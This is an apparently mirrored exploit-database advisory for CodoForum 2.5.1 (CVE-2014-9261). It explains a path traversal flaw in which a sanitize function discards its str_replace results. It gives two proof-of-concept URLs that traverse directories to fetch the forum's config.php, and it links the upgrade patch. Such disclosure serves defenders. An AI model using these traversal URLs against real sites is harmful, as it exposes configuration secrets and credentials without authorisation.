Skip to content
cyberexploits
webappphptext

CodoForum 2.5.1 - Arbitrary File Download

CodoForum 2.5.1 - Arbitrary File Download

Publié le 2015-03-10

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/php/webapps/36320.txt7eac4c3a
raw
# Exploit Title: Codoforum 2.5.1 Arbitrary File Download

# Date: 23-11-2014

# Software Link: https://codoforum.com/

# Exploit Author: Kacper Szurek

# Contact: http://twitter.com/KacperSzurek

# Website: http://security.szurek.pl/

# Category: webapps

# CVE: CVE-2014-9261



1. Description

  

str_replace() is used to sanitize file path but function output is not assigned to variable



private function sanitize($name) {



    str_replace("..", "", $name);

    str_replace("%2e%2e", "", $name);



    return $name;

}



http://security.szurek.pl/codoforum-251-arbitrary-file-download.html



2. Proof of Concept



http://codoforum-url/index.php?u=serve/attachment&path=../../../../../sites/default/config.php

or

http://codoforum-url/index.php?u=serve/smiley&path=../../../../../sites/default/config.php



3. Solution:

  

Use patch:



https://codoforum.com/upgrades/codoforum.v.2.6.up.zip
Voir sur GitHub